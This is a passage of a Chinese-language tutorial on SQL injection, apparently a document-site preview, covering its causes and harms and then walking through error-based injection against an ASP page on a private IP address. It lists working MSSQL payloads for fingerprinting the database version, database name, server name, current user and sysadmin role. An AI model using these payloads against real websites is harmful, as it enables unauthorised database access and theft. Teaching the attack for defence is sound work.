信息安全技术之SQL注入式攻击 SQL注入式攻击是一种常见的网络攻击方式,通过将恶意的SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串中,欺骗服务器执行恶意的SQL命令。这种攻击方式可以让攻击者获得未经授权的数据库访问权限,甚至获取管理员密码和私自添加系统账号或数据库使用者的账号。 为什么会存在SQL注入?随着B/S结构的大量使用,很多开发人员开始开发,但开发人员参差不齐,相当一部分的开发人员在编码的过程中,没有对用户的输入数据或是页面中所携带的信息进行必要的合法性的判断,导致攻击者可以提交一段数据库查询代码,根据程序的返回结果,获得一些想要得到的数据。 SQL注入攻击的危害包括:未授权情况下操作数据库中的数据、恶意篡改网页内容、得到管理员密码、私自添加系统账号或数据库使用者的账号等。由于SQL注入攻击是利用HTTP服务从正常的WWW端口访问,而且表面看起来和一般的网页访问差不多,所以,目前市面的防火墙都不会对SQL注入发出警报,如果管理员没查看IIS日志的习惯,就可能在被入侵很长时间后都不会发觉。 如何测试是否存在SQL注入?可以通过在URL尾处加上单引符号“ ' ”,然后判断页面返回的结果是否不同。如果返回结果不同,可能存在SQL注入漏洞。 实例: 访问:http://192.168.106.94/sql/zc_item.asp?id=1 在1的后面输入单引号Sql正常语句被人为制造了错误结论,开始攻击该网站可以进行SQL注入,下面我们来攻击这个网站。 步骤: 1. 判断对方数据库的类型和版本:and 1=(select @@VERSION) 2. 获取当前数据库名:And 1=(select db_name()) 3. 获取本地服务名:and 1=(select @@servername) 4. 判断是否是系统管理员:and 1=(select IS_SRVROLEMEMBER('sysadmin')) 5. 获取当前数据库用户名:and user>0 Sqlserver的dbo就是sa 6. 另一个方法获取当前数据库名:and db_name()>0 SQL注入式攻击是一种非常危险的网络攻击方式,需要开发人员和管理员提高警惕,确保自己的网站和数据库系统的安全。
剩余61页未读,继续阅读
- 粉丝: 0
- 资源: 7
- 我的内容管理 展开
- 我的资源 快来上传第一个资源
- 我的收益 登录查看自己的收益
- 我的积分 登录查看自己的积分
- 我的C币 登录后查看C币余额
- 我的收藏
- 我的下载
- 下载帮助